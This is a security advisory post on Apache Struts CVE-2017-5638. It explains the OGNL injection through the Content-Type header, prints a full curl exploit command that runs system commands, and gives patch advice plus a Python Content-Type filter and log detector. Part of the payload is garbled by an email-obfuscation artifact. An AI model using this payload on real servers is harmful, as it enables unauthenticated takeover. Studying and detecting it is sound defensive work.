Apache Struts, Remote Code Execution, CVE-2017-5638 (Critical)


The CVE-2017-5638 vulnerability in Apache Struts 2 stems from flawed error handling in the Jakarta Multipart parser. When a request to a Struts endpoint carries a malformed Content-Type header, the framework builds an error message that embeds the unsanitized header value, and that message is then evaluated as an Object-Graph Navigation Language (OGNL) expression. Because OGNL expressions can execute arbitrary Java code on the server, an attacker can place a malicious OGNL expression in the Content-Type header; the framework evaluates it while building the error message, and it runs with the privileges of the application. The result is unauthenticated remote code execution: complete compromise of the server, including running arbitrary system commands, reading or modifying data, and taking control of the affected host.
Platform: Apache Struts 2
Version: 2.3.5 – 2.3.31, 2.5 – 2.5.10

Vulnerability: Remote Code Execution

Severity: Critical

Date: 2017-03-07

Prediction: Patch Available

What Undercode Says:

`curl -H “Content-Type: %{(_=’multipart/form-data’).([email protected]@DEFAULT_MEMBER_ACCESS).(_memberAccess?(_memberAccess=dm):((container=context[‘com.opensymphony.xwork2.ActionContext.container’]).(ognlUtil=container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(ognlUtil.getExcludedPackageNames().clear()).(ognlUtil.getExcludedClasses().clear()).(context.setMemberAccess(dm)))).(cmd=’id’).(iswin=(@java.lang.System@getProperty(‘os.name’).toLowerCase().contains(‘win’))).(cmds=(iswin?{‘cmd.exe’,’/c’,cmd}:{‘/bin/bash’,’-c’,cmd})).(p=new java.lang.ProcessBuilder(cmds)).(p.redirectErrorStream(true)).(process=p.start()).(ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(process.getInputStream(),ros)).(ros.flush())}” http://target.com/struts2-endpoint`

How It Is Exploited:

An attacker crafts an HTTP request with a malicious OGNL expression in the Content-Type header. The exploit triggers when the multipart parser raises a file-upload error: the OGNL expression is evaluated during error handling and executes system commands, giving the attacker a remote shell.

Protection from this CVE:

Apply the vendor patch immediately: upgrade to Struts 2.3.32 or 2.5.10.1. As a compensating control, implement WAF rules and filter malicious Content-Type headers before they reach the multipart parser.
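The filtering and detection side of that advice, as an added example that is not part of the original post or of Struts itself: a strict allow-list for the Content-Type value, an OGNL-marker signature, and a scan over constructed access-log lines. The log format (Content-Type appended as the last quoted field of each line) is an assumption.

```python
import re

# Strict allow-list for a media type (type/subtype plus optional parameters). OGNL needs
# characters such as '{', '(' and '@', so anything else is rejected before the multipart parser.
_MEDIA_TYPE = re.compile(
    r"^[A-Za-z0-9][A-Za-z0-9!.+\-]*/[A-Za-z0-9][A-Za-z0-9!.+\-]*"
    r"(\s*;\s*[A-Za-z0-9!.+\-]+=(\"[^\"{}()@]*\"|[A-Za-z0-9!._+\-=/]+))*\s*$"
)

# Markers found in OGNL expressions but never in a legitimate Content-Type value.
_OGNL_MARKERS = re.compile(r"%\{|\$\{|@[\w.]+@|#_memberAccess|ognl\.OgnlContext", re.I)

# Constructed access-log format (assumption): the proxy appends the request Content-Type
# as the last quoted field of each line.
_LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) "(?P<ctype>.*)"$'
)

def is_allowed_content_type(value: str) -> bool:
    """True only if the header is a syntactically plain media type (positive filter)."""
    return bool(_MEDIA_TYPE.match(value))

def looks_like_ognl(value: str) -> bool:
    """True if the header carries an OGNL expression marker (detection signal)."""
    return bool(_OGNL_MARKERS.search(value))

def flag_suspicious_requests(log_text: str) -> list:
    """Return (ip, path, content_type) for every request whose Content-Type is rejected."""
    hits = []
    for line in log_text.splitlines():
        m = _LOG_LINE.match(line)
        if not m or m.group("ctype") == "-":
            continue  # unparsable line or request without a Content-Type header
        ctype = m.group("ctype")
        if looks_like_ognl(ctype) or not is_allowed_content_type(ctype):
            hits.append((m.group("ip"), m.group("path"), ctype))
    return hits

# Constructed sample log; the two 500-status lines carry OGNL fragments in Content-Type.
SAMPLE_LOG = """\
10.0.0.5 - - [07/Mar/2017:10:01:02 +0000] "POST /upload.action HTTP/1.1" 200 "multipart/form-data; boundary=----WebKitFormBoundaryabc123"
10.0.0.9 - - [07/Mar/2017:10:01:05 +0000] "POST /upload.action HTTP/1.1" 500 "%{(#_='multipart/form-data')}"
10.0.0.9 - - [07/Mar/2017:10:01:07 +0000] "GET /index.action HTTP/1.1" 200 "-"
10.0.0.7 - - [07/Mar/2017:10:01:09 +0000] "POST /upload.action HTTP/1.1" 500 "${@java.lang.System@getProperty('os.name')}"
"""

if __name__ == "__main__":
    print(flag_suspicious_requests(SAMPLE_LOG))
```

The allow-list is the primary control (it rejects anything that is not a plain media type), while the marker regex is a detection signal for alerting; a 500 response paired with a rejected Content-Type on a `.action` endpoint is the pattern worth hunting for in historical logs.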

Impact:

Complete server compromise. Arbitrary command execution. Data theft and modification. Full application control.


Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
